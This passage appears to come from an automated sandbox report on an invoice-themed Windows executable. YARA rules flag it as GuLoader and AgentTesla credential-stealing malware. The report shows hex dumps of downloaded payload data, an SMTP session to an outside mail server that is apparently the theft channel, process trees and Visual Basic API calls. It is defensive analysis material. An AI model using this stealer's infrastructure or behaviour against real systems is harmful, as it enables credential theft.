cd 00 f4 c4 10 ce 46
                                              Data Ascii: +_|;4)MWCTFM5'&Q;7R6vrv'D-;5JsCVgpkpUJt1cSh[=4Wh1O&KZpb-Vx9/pN^~Jn[%4";06tOL#OdH6s1F
                                              2021-11-29 10:29:51 UTC207INData Raw: 95 99 e1 6d 6e b5 1d 0f 2b 45 3f 9f 00 88 dc ed 49 e6 7e a5 e6 9e c4 fa 69 28 da b9 6a 4a 03 38 ef 70 ea 50 6e 76 d4 6e d2 bf 95 ca 20 4b 6d 4f a5 e6 49 85 d3 fb 98 4f 47 6f f8 bf d1 10 ac 61 1f 9b 1c 69 7e c2 8c e7 27 4f 9e 66 8c c6 fe 46 9d a1 6d 6e a7 38 ff 96 de 25 a5 96 ef 06 5f cd 18 99 b7 2e 9d a9 1c 5d 58 27 48 49 f7 75 5d c5 2f 99 c5 4b 1c bb 73 0f 45 1a 60 d4 f2 d2 46 f3 4a 6e e8 f7 64 36 03 c0 a9 f9 55 4d b5 c8 ab e9 ce e1 f6 6e ff 6b 70 0a 75 ae b1 b6 78 3d 6e 80 f4 ca b4 b8 ca 8f 1d 9e 69 90 f2 56 08 51 c2 b0 2a 5a 6a 97 5b 15 61 1a 4c f7 e3 00 36 96 c1 7a 2c 60 5b 97 42 42 81 0c 22 fd 69 80 13 99 a8 c0 e6 3a d7 13 17 67 c1 8e f5 80 c5 b6 1d 77 1c 22 5d 34 84 eb f3 21 4b 11 ef f3 6c 77 93 bf 5d fc df b3 b1 2f ea af fd fb e0 6e 47 05 ed db 3e
                                              Data Ascii: mn+E?I~i(jJ8pPnvn KmOIOGoai~'OfFmn8%_.]X'HIu]/KsE`FJnd6UMnkpux=niVQ*Zj[aL6z,`[BB"i:gw"]4!Klw]/nG>
                                              2021-11-29 10:29:51 UTC208INData Raw: 31 a9 ab 01 92 6b 59 87 74 53 8e 08 a5 16 98 a6 e6 8c 9f 0b e6 73 9b ef 91 82 37 80 df ad 03 d3 1c e4 a9 12 e3 57 fe 69 dc 1f 88 6f b2 3b 13 a8 63 d9 82 3b bb a6 aa ab ca 90 39 42 dc b3 c3 a0 68 1a 6c c7 e4 dc ce 8a 8c 57 1a 45 c9 5b be 41 d4 81 5a 5c 81 dc bd e2 d0 00 d9 47 bf 34 81 72 e2 2a 8f e9 d7 c4 f6 1e 55 ce da f8 e2 02 8a a0 9c 60 04 77 3c af 04 2b 48 9a b2 4f d4 de ac 84 f4 a4 6d 58 fd 17 0d 9d 6f d0 50 76 72 d3 78 da 23 97 77 69 5e 04 3f 89 de e8 8b f1 5f 99 4d 2e e8 4c 74 6c 33 4c 47 f8 25 64 eb 1e 29 be 21 e5 35 fd e8 d0 83 c6 73 11 3e af 9b 42 e1 e7 72 8f 86 14 cb 5c 2d 06 73 34 65 58 91 60 4c 89 6d b5 b1 67 c1 58 9f dd e6 f8 9e a2 fc 21 2a af 4b 54 38 a2 6d 43 59 c1 52 85 a0 d9 ce 28 8c d4 aa cf 9d ce dc 3f 48 6b 19 2e b6 fa 9f 6e d6 a0 82
                                              Data Ascii: 1kYtSs7Wio;c;9BhlWE[AZ\G4r*U`w<+HOmXoPvrx#wi^?_M.Ltl3LG%d)!5s>Br\-s4eX`LmgX!*KT8mCYR(?Hk.n
                                              2021-11-29 10:29:51 UTC209INData Raw: fc 83 f9 6a 18 74 3a 1e 7a e1 ab 82 c2 ab 65 bb f2 2f 1f f2 d6 30 b5 b2 de d6 5b 9e ae bd b6 94 17 36 63 29 2f 53 3e bc af c0 a1 9c 72 14 03 5b d0 c0 96 fb f5 e5 a8 d0 ab 53 a8 f7 b1 f5 2f a1 c5 fa 1b ef 0a c6 db f2 6f 54 43 14 97 cf a4 5d a8 e3 7e 91 f8 ff 94 69 b4 83 6e 5f 76 59 63 04 2e 3d 35 26 57 f3 6f 6c 72 27 e0 e1 46 7a 5d ad a3 cf b5 6b 47 87 3f b9 fb a3 03 e2 91 32 a5 c1 7d 79 59 9e 2f 64 45 84 6b 38 de 2f 57 9c 69 3f 54 06 e7 22 e6 ac e5 3d a3 0e 0c 8f c6 d9 b9 7b 44 17 27 3e b9 a9 6c 41 d0 93 3b d3 e0 fe de ee a8 be 35 9d 7a 96 9c 51 88 00 10 9e 00 26 e8 45 a0 7a 9e fa e2 7b 47 fd ef ff 9d 66 6d 93 29 40 ba db 23 7c 3a 98 15 e7 01 7f ba 88 65 cc 5a 9a 83 60 fc dd 86 76 1e 42 7b 8c 1f 2f 9b 14 a4 b7 10 05 03 29 c8 ca cd ed 6a f6 8f 8b fa be 6c
                                              Data Ascii: jt:ze/0[6c)/S>r[S/oTC]~in_vYc.=5&Wolr'Fz]kG?2}yY/dEk8/Wi?T"={D'>lA;5zQ&Ez{Gfm)@#|:eZ`vB{/)jl
                                              2021-11-29 10:29:51 UTC210INData Raw: 08 3a 26 c2 d8 a7 d7 e9 ab e2 53 eb 6b f9 85 25 5e 01 bf 52 ca 2a 3d 90 23 58 12 6e 3e 9e e1 7a 4f f2 9e 3e 5f 09 27 d6 4c 38 f8 65 73 b4 12 d6 65 d8 c3 b5 89 44 cb 45 72 1b 9e fa 86 c7 88 c4 74 04 66 3f 0a 6f fd a8 92 52 2e 69 9a ef 3c 27 fa cb 2f a0 b2 cd c6 6a 9c ad b5 bf 91 05 b6 f0 bb 3e 88 29 d5 a9 dd b1 f8 6a 31 0d 50 57 51 8f e7 e1 f6 3b 34 ae 4d a9 ea a3 ef 32 be d9 e8 08 f1 10 c4 c7 f3 69 42 d6 a3 15 44 b7 2e ae c6 5c 82 86 f1 9e 6a 84 80 6e 4f 6a 41 65 25 24 32 3b 32 54 e7 62 7e 4a 3f fd fc 55 7d 5f b8 b1 5c a4 ab 5c a7 39 ab 78 7a 1b fe 92 3b ab c3 7f 65 43 8e 2b 60 57 8a e9 e4 dc ae 87 9b fb 6b cb 87 20 2c f5 be 65 a2 22 cd 02 0a 66 de e8 f5 b4 03 86 a6 b9 ae fe 25 90 b0 34 dc ea f5 f0 f2 af 2c 65 01 5b 98 80 c3 dc 9b 25 8d 80 ad 69 82 32 3d
                                              Data Ascii: :&Sk%^R*=#Xn>zO>_'L8eseDErtf?oR.i<'/j>)j1PWQ;4M2iBD.\jnOjAe%$2;2Tb~J?U}_\\9xz;eC+`Wk ,e"f%4,e[%i2=
                                              2021-11-29 10:29:51 UTC211INData Raw: 57 f2 28 5e aa 1d 06 1d 4f 25 1f 81 de 26 86 7e 2e d2 6c 84 5b 92 9a a9 8a 82 04 69 5a c6 fb 0e 80 9d 12 ec f0 7e b7 2d 28 61 17 5d 3f 04 f3 00 26 eb 99 5b ca 6f bb 3a e5 9f a0 84 eb de 9a 55 5b d8 57 19 50 c6 13 a8 38 aa d0 fb cd 85 96 45 e4 a9 db a4 eb b1 df 55 18 35 5e 5d d0 89 f7 0a bc c9 f4 dc 07 8c 01 2b d3 33 4d 5a 1f 7d 15 71 9d ce 15 8e c6 ef 5f 4b 1c 54 e3 85 c8 17 48 d1 49 a2 ff a7 65 79 de d6 9c 01 12 54 46 68 56 3e 5b e3 1d c0 b2 8f 05 94 03 ff 8b f0 b4 8a 01 3a 2b fd 16 08 53 56 8f 1f ae 3f 03 05 a5 7c 07 cf ea 8c 42 3f 0d 33 53 eb 08 6a aa 96 de 3e 2b 17 93 d6 d4 4d db 0f 6e ec f3 5a 2e a6 ff 83 5d 2f e1 81 f7 af fb 10 e2 a4 2f 22 c0 54 89 f8 b9 24 e9 e2 99 72 2e 27 7c fe d7 54 80 e9 6f 2e 38 52 22 3a 9f 1a 2e b4 27 c9 ae 27 5a de 0d 7f 20
                                              Data Ascii: W(^O%&~.l[iZ~-(a]?&[o:U[WP8EU5^]+3MZ}q_KTHIeyTFhV>[:+SV?|B?3Sj>+MnZ.]//"T$r.'|To.8R":.''Z
                                              2021-11-29 10:29:51 UTC212INData Raw: 77 db a5 f5 a9 0c 09 34 98 bb f9 b6 56 1e 38 c1 e8 e8 ff e9 af 2c 66 35 58 98 80 da 7d 06 25 8e 83 85 6a 83 b3 6e 97 ef 77 a7 d7 cc 3c e3 13 bb 77 94 29 41 7e c1 bf 90 23 bf 1f e3 1e 4d 3b 80 69 d3 d4 61 9c fd 0b d7 88 62 07 dc cd ae 12 29 8e 0c a2 b6 10 20 0e 26 db dd ac f8 61 f0 8d 89 f5 be 67 ad 97 22 a9 e4 d7 d6 36 92 ef 5c 5c 6a 81 45 a6 be 95 f9 cd b8 62 fd bb 37 ea 8d a4 3c 2e a3 bd 54 be c1 56 c2 29 a7 e3 6e 0a ff 1a 29 e5 6a 8c 43 e8 d7 12 67 f7 71 82 53 d6 95 f5 fc 4b c2 bf cf 77 b1 f5 04 a8 67 07 63 b4 3a 2e f5 ec 0c c5 45 eb 31 25 ae 77 3e cd cd c7 cc 3e 59 59 37 f4 c8 ad c0 17 f9 40 ac 8d b3 b6 f0 db 1c 7e 22 aa bc 04 2e 83 62 fa 29 e8 85 bd bd 25 fd a0 2e cc 4d ea f3 3a 45 e4 68 d5 a6 97 73 32 e1 b5 e7 9b 65 d9 b0 ef 7a 61 69 12 ef 76 4d 32
                                              Data Ascii: w4V8,f5X}%jnw<w)A~#M;iab) &ag"6\\jEb7<.TV)n)jCgqSKwgc:.E1%w>>YY7@~".b)%.M:Ehs2ezaivM2
                                              2021-11-29 10:29:51 UTC214INData Raw: 05 c8 5b 87 fd b6 37 66 c3 87 75 55 b8 70 e1 c5 47 81 f1 70 22 11 57 35 a5 af 0d 36 ac 2a cd af 21 45 d1 0c 67 34 62 12 bd f0 bd 2d 87 13 3f 95 97 34 56 6a dc f3 92 3c 0f e1 bc ee 85 bb ef 8c 0e 82 34 37 62 02 d2 c9 dd 04 35 13 d7 a9 b1 c2 69 3c e7 61 6b 29 e2 85 a3 ce 1c bf 52 0b 38 33 f7 31 4d 13 76 2c 91 62 67 4f ea 83 37 5f 09 29 f1 c3 65 f6 11 75 b4 03 fe 64 c7 db a8 94 53 d5 53 72 11 90 64 2d fc 88 f1 6f 08 7d 30 99 c3 e1 b8 11 02 3b 73 1a 6a 2f 00 75 96 3b a1 b2 cc da 51 8c 2d ba b6 80 96 77 79 a1 ac 34 29 3d 0e d5 bb f2 77 32 0d 47 5e 53 9b f3 e5 66 f7 b1 af 50 a1 f8 b1 e2 ad ef c2 f4 16 e3 03 ce d1 f7 61 44 c0 b9 90 c9 b7 3e ad cb 7c 87 94 e1 98 64 9c 8f 67 56 6c 55 6d 0b 2e 3b 3b 36 53 e4 77 6f d7 ba e1 ee 55 7d 45 a3 ad d3 28 a4 4a ba 31 a3 66
                                              Data Ascii: [7fuUpGp"W56*!Eg4b-?4Vj<47b5i<ak)R831Mv,bgO7_)eudSSrd-o}0;sj/u;Q-wy4)=w2G^SfPaD>|dgVlUm.;;6SwoU}E(J1f
                                              2021-11-29 10:29:51 UTC215INData Raw: 3d e5 b8 b5 a7 b8 64 a5 26 dd 31 f0 7a ab 59 fe ec 95 aa 9b 73 30 a4 b2 9a 8e 10 58 40 ee 06 e0 5a 1c f3 64 57 bd 6a de 38 7b cd c7 f8 93 d8 0f 39 9a 73 71 e9 05 a3 7b 38 0f 20 55 a9 3e eb 1a 11 2a 22 73 ee be 87 f1 86 57 f6 33 5d bb 04 09 9a 67 2e 0a 95 41 12 9f 78 5a 50 e9 9d 5d 8f 9f bb 01 98 1c 71 4d b2 f9 06 8a 89 0a e9 ef 7e a8 22 25 6f 1e 5d 39 18 76 86 2b e7 1c d5 4b 5e b4 54 ee a2 a5 8b 6d fa 95 68 5b de 56 00 45 cb 1c 29 25 bd 72 eb d1 9b 88 5d fe b7 da ae ed b7 dd 4c 36 1b 57 4a c6 99 6b 96 bb db 77 80 09 fa 3a 38 c1 b0 c9 5e 03 f2 52 78 90 c1 91 d3 cd f2 46 c9 af 4b e8 8d df 88 44 8b 40 86 ff a4 65 c1 de d6 9c 1d 07 d3 41 78 d9 ad 5b e3 08 c3 8f 8b 19 08 9b f4 89 ea b7 9e 00 2d b4 d9 10 1d 5e 4d 8a 00 ad 2a 0e 10 e9 69 92 cf e5 08 d5 23 1a a0
                                              Data Ascii: =d&1zYs0X@ZdWj8{9sq{8 U>*"sW3]g.AxZP]qM~"%o]9v+K^Tmh[VE)%r]L6WJkw:8^RxFKD@eAx[-^M*i#
                                              2021-11-29 10:29:51 UTC216INData Raw: 83 91 1e 95 6c 94 85 69 40 ea c1 67 45 26 33 33 25 54 ed 62 7d 52 23 e4 e0 48 77 58 bd a3 dd 31 a5 42 a7 3f af 8b 66 07 e2 94 3f a4 c2 7d 7d 45 7e 28 62 49 90 ec f7 ca a4 83 88 f4 fb c6 2a 3b 2a fd bd 64 87 25 d4 06 82 ce d1 a3 ff 81 10 0f 37 b5 bc e6 a6 de bb 32 ce f5 fe f6 e6 b2 36 e1 b8 58 9c 86 d9 59 26 31 9d 0b 33 6f 95 b8 76 9e e0 6a b3 75 7f 35 e5 15 a6 77 86 30 c7 43 ce 35 7c 33 a4 1f f1 03 58 a8 0a ea d5 d2 67 9a e4 25 d8 87 7c 1d 5e 7e bd 9f a6 97 92 2d ae 94 a4 06 28 d4 c7 d4 66 ee f2 8b 9b 77 31 6f a3 84 22 bd 72 44 5e af 91 e9 50 d1 f9 12 73 35 d1 87 79 67 af c1 7d ad b5 52 88 bd 17 2e b3 2d 6b bd f3 d5 d5 b9 e4 ee 6f 17 ef 87 8b f2 62 9f 47 f6 d9 9b f6 eb 6e 1f f9 d0 81 e2 ee 49 e5 a4 d7 65 a4 7c 95 a1 7d 82 3e b0 a8 07 68 f0 13 50 f3 6e a8
                                              Data Ascii: li@gE&33%Tb}R#HwX1B?f?}}E~(bI*;*d%726XY&13ovju5w0C5|3Xg%|^~-(fw1o"rD^Ps5yg}R.-kobGnIe|}>hPn
                                              2021-11-29 10:29:51 UTC218INData Raw: 51 f9 80 21 a1 9b 8b 70 0e f0 81 ff 31 72 0f a8 4d d0 1e 16 44 cb 6e 10 2b e2 1a 98 59 6c 8d dd f5 9b cc ce 1a a1 20 ed 3a ec b5 0b 37 32 ae e2 98 c5 df 45 d2 10 79 7e 9d 4f 23 83 e7 94 c0 c6 e2 83 0a bc ec 9e 25 dc a9 3b cc 5d 9d fa b8 a5 08 f0 1b 8b 2e a2 79 e1 d7 54 95 e2 6f 25 3f 5b 24 2f 87 1e 3b ac 21 c8 88 23 59 c5 90 92 26 71 00 a8 f5 b3 2a 8e 1d 34 81 8d 29 5f 65 c8 fb 8e a0 84 d5 a8 4e 6b af f3 10 92 8a 26 b3 93 00 d6 dd ca 8d 48 25 d7 b6 ae d9 e1 a2 ef 62 6b 50 fe 85 a2 bb 1b ad d1 4c 2b 2a f1 35 65 0e 66 30 02 7a 66 41 62 72 35 44 12 37 ed 40 39 f9 64 60 b5 1d e1 7f da c5 b4 86 5f 56 6d 75 33 80 e4 86 72 6a d7 61 39 6a 20 0a da 0c b8 10 97 22 66 9d ee 2b 18 f6 c4 b3 68 a1 d5 dc 58 be ad b5 b2 83 94 e6 7b 89 bd 5c 29 3c 7a cc 30 20 75 31 03 4b
                                              Data Ascii: Q!p1rMDn+Yl :72Ey~O#%;].yTo%?[$/;!#Y&q*4)_eNk&H%bkPL+*5ef0zfAbr5D7@9d`_Vmu3rja9j "f+hX{\)<z0 u1K
                                              2021-11-29 10:29:51 UTC219INData Raw: ec 6a 99 c4 60 cb 81 7f 6b 7a 9a 58 ca 1c e0 e3 c2 eb b0 c2 67 ab 69 98 a1 68 83 36 b0 a9 0a 6d ff 83 d8 50 4a aa 36 3d 6b 70 df c4 e9 dc ac 78 ca 2d 95 c8 a5 d4 84 dd 01 ac 65 b3 ae d6 d3 07 ff 25 b1 16 cd 27 80 61 ae 34 ff 24 b5 ab a3 7e 2f 13 c4 78 fc 73 b1 c6 cb f4 90 b5 9c 75 34 8a b3 80 86 07 c4 dc e7 1c 69 19 18 fc 79 4f 2c f2 dd 34 fa 9d d7 f6 83 c5 07 11 85 6b 7c fc 0e b2 0d 30 75 a1 74 bb 62 e3 23 1b 1f 2a 6b e7 be 94 fc 95 5a e2 34 52 bf 05 07 05 4e 3d 15 98 54 0b 9f 61 40 d6 6c 81 5d 8e 9f 89 82 98 04 76 4f dc f6 1a 95 90 0a f0 ef 67 a4 39 30 7d 0b 45 32 0e f2 15 a1 fb 1c c7 c8 75 22 3c ed 85 a7 84 eb d1 f6 42 7e d5 56 00 50 c6 1c 2f 30 bd 58 ed d6 9b 8e 44 fc bb ce ae e1 bd dc 53 3d 3a 41 c4 d6 99 6e 06 b1 ce f0 ce 09 1f a9 28 db 2c 55 57 19
                                              Data Ascii: j`kzXgih6mPJ6=kpx-e%'a4$~/xsu4iyO,4k|0utb#*kZ4RN=Ta@l]vOg90}E2u"<B~VP/0XDS=:An(,UW
                                              2021-11-29 10:29:51 UTC220INData Raw: aa 90 42 2e 61 9b f3 2e 12 f4 d6 33 bd bc d0 d4 5f 9e af bf b8 92 17 37 71 a9 be 5d 3b bc af dd b3 f9 77 34 03 49 50 5d 93 fb f4 e4 ba b9 af 53 a9 f6 bf f3 2f a2 c4 f4 15 ed 0d c6 d9 f3 61 45 c3 b1 94 c9 b6 30 ae c3 7c 83 95 f1 96 6c 94 81 6f 51 6a 5d 63 05 26 33 33 21 54 ef 62 7d 56 23 e0 e0 48 73 58 ad a3 dd 35 aa 42 a7 3f ab 7b 66 07 e2 90 3f ab c2 7d 79 45 8e 28 62 4b 96 eb f5 cc af 86 8e e9 ea 46 86 3e 2c e0 ac e4 2f 21 d3 12 8a c6 d9 8b fb a1 91 1f 3f b8 bb d4 a4 d4 33 3a d2 e8 fb fe ee ba 3e e4 98 5a 96 8e d1 5c 06 31 9f 01 34 38 90 b3 fd 96 e8 62 b6 55 7d 3e ed 1d b3 70 96 3b c0 4a d3 3e 74 39 b8 7d ed 0b df b9 89 6b dd da 6f 92 e0 05 d9 86 77 16 5e 7d ac 1c 27 86 11 2c bf 17 25 00 28 d5 cf c5 e5 6f f6 8d 8a f4 b0 69 a3 84 25 ac f1 c5 57 3f 93 e1
                                              Data Ascii: B.a.3_7q];w4IP]S/aE0|loQj]c&33!Tb}V#HsX5B?{f?}yE(bKF>,/!?3:>Z\148bU}>p;J>t9}kow^}',%(oi%W?
                                              2021-11-29 10:29:51 UTC221INData Raw: 49 45 dd 3f 8b a3 ab e6 30 9a c7 a9 d5 86 d1 a8 7d 5b 5b 3d 7a b2 f8 87 21 cc fa d4 fe 16 94 14 0d f3 11 70 7f 31 53 2e 04 fb a2 65 f6 b0 93 32 2f 5b 31 83 fb b8 7e 24 e6 20 c4 8f c3 82 1c fc b4 f7 62 65 ba 72 48 39 43 1a 85 76 aa c4 ef 79 ab 26 82 ea ac d2 f5 78 5b da e1 3c 73 37 27 f9 67 89 18 35 15 aa 4e a5 fa d7 a9 6c 1e 27 53 b4 97 6f 8d d4 ff be 47 7e 78 ff bd b8 2f b0 75 0e 8d 4f 4a 39 83 c2 a6 60 16 dc 70 87 d1 8b 6c 99 b9 51 3c cf 5f ba d8 96 0a 90 90 ee 14 48 ec 1b 9a b6 64 90 e6 4e 04 50 26 54 42 f7 72 5f c8 11 cc a2 27 58 d4 10 7a 28 7f 0e a0 f2 b5 23 87 15 3e 89 85 01 58 77 c0 ee 9c 21 1d d4 ba ce 87 ba e1 91 0b 8b 34 33 7f 07 dc d4 d8 0c 3d 27 d0 b1 a4 d0 e8 a5 e6 73 ea 69 f7 97 22 57 1d ad d3 4b 36 2f f9 3f 45 0e 73 22 83 e3 67 53 e2 9e 39
                                              Data Ascii: IE?0}[[=z!p1S.e2/[1~$ berH9Cvy&x[<s7'g5Nl'SoG~x/uOJ9`plQ<_HdNP&TBr_'Xz(#>Xw!43='si"WK6/?Es"gS9


                                              SMTP Packets

                                              TimestampSource PortDest PortSource IPDest IPCommands
                                              Nov 29, 2021 11:31:27.601023912 CET58749801212.83.130.20192.168.11.20220-srv.teknomarketler.com ESMTP Exim 4.94.2 #2 Mon, 29 Nov 2021 13:31:26 +0300
                                              220-We do not authorize the use of this system to transport unsolicited,
                                              220 and/or bulk e-mail.
                                              Nov 29, 2021 11:31:27.601380110 CET49801587192.168.11.20212.83.130.20EHLO 760639
                                              Nov 29, 2021 11:31:27.622623920 CET58749801212.83.130.20192.168.11.20250-srv.teknomarketler.com Hello 760639 [102.129.143.99]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-PIPE_CONNECT
                                              250-AUTH PLAIN LOGIN
                                              250-STARTTLS
                                              250 HELP
                                              Nov 29, 2021 11:31:27.623333931 CET49801587192.168.11.20212.83.130.20STARTTLS
                                              Nov 29, 2021 11:31:27.646333933 CET58749801212.83.130.20192.168.11.20220 TLS go ahead

                                              Code Manipulations

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: 184285013-044310-Factura pendiente (2).exe PID: 408 Parent PID: 7660

                                              General

                                              Start time:11:29:11
                                              Start date:29/11/2021
                                              Path:C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exe"
                                              Imagebase:0x400000
                                              File size:155648 bytes
                                              MD5 hash:D69E979D7A91CDFA8915049A4E6454A5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Visual Basic
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: conhost.exe PID: 376 Parent PID: 408

                                              General

                                              Start time:11:29:11
                                              Start date:29/11/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff711d90000
                                              File size:875008 bytes
                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: CasPol.exe PID: 376 Parent PID: 408

                                              General

                                              Start time:11:29:30
                                              Start date:29/11/2021
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exe"
                                              Imagebase:0xf60000
                                              File size:108664 bytes
                                              MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.9991804971.0000000001340000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.14854458550.000000001E461000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.14854458550.000000001E461000.00000004.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: conhost.exe PID: 1388 Parent PID: 376

                                              General

                                              Start time:11:29:31
                                              Start date:29/11/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff711d90000
                                              File size:875008 bytes
                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Chronological Activities

                                              Disassembly

                                              Code Analysis

                                              Reset < >

                                                Analysis Process: 184285013-044310-Factura pendiente (2).exe PID: 408 Parent PID: 7660 184285013-044310-Factura pendiente (2).exeCOMMON

                                                Executed Functions

                                                Function 0041CDD4, Relevance: 344.8, APIs: 180, Strings: 16, Instructions: 1804COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 0041CDF2
                                                • #692.MSVBVM60(?,Unecliptic9,Bovlamme1,?,?,?,?,00401356), ref: 0041CE47
                                                • __vbaVarTstEq.MSVBVM60(00008008,?), ref: 0041CE6E
                                                • __vbaFreeVar.MSVBVM60(00008008,?), ref: 0041CE80
                                                • __vbaNew2.MSVBVM60(00403C50,004223FC,00008008,?), ref: 0041CEAE
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C40,00000014), ref: 0041CF10
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,00000108), ref: 0041CF6F
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403C60,00000108), ref: 0041CF91
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041CFB0
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041CFE9
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,00000158), ref: 0041D033
                                                • #618.MSVBVM60(?,00000087), ref: 0041D04F
                                                • __vbaStrMove.MSVBVM60(?,00000087), ref: 0041D059
                                                • __vbaFreeStr.MSVBVM60(?,00000087), ref: 0041D061
                                                • __vbaFreeObj.MSVBVM60(?,00000087), ref: 0041D069
                                                • #711.MSVBVM60(?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041D0A0
                                                • __vbaAryVar.MSVBVM60(00002008,?,?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041D0B1
                                                • __vbaAryCopy.MSVBVM60(?,?,00002008,?,?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041D0C7
                                                • __vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,00002008,?,?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041D0DC
                                                • __vbaSetSystemError.MSVBVM60(?,?,00401356), ref: 0041D0F6
                                                • #517.MSVBVM60(phrontisterium), ref: 0041D117
                                                • __vbaStrMove.MSVBVM60(phrontisterium), ref: 0041D121
                                                • __vbaNew2.MSVBVM60(00403258,00422010,phrontisterium), ref: 0041D140
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D179
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000048), ref: 0041D1BD
                                                • #712.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D1E4
                                                • __vbaStrMove.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D1EE
                                                • __vbaFreeStr.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D1F6
                                                • __vbaFreeObj.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D1FE
                                                • __vbaNew2.MSVBVM60(00403258,00422010,STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D21D
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D256
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000000A0), ref: 0041D2A0
                                                • __vbaStrToAnsi.MSVBVM60(?,?), ref: 0041D2BB
                                                • __vbaStrToAnsi.MSVBVM60(?,Tvivlsomst9,00000000,?,?), ref: 0041D2CA
                                                • __vbaSetSystemError.MSVBVM60(00000000,?,Tvivlsomst9,00000000,?,?), ref: 0041D2DB
                                                • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000,?,Tvivlsomst9,00000000,?,?), ref: 0041D306
                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00401356), ref: 0041D311
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,?,?,00401356), ref: 0041D33F
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D378
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000050), ref: 0041D3BC
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041D3E3
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D41C
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000170), ref: 0041D466
                                                • __vbaStrCat.MSVBVM60(?,?), ref: 0041D480
                                                • __vbaStrMove.MSVBVM60(?,?), ref: 0041D48A
                                                • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?), ref: 0041D499
                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D4AB
                                                • __vbaPrintObj.MSVBVM60(00403D30,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D4C6
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,?,?,00401356), ref: 0041D4E8
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D521
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000110), ref: 0041D56B
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041D592
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D5CB
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000100), ref: 0041D615
                                                • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041D637
                                                • __vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D640
                                                • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D64D
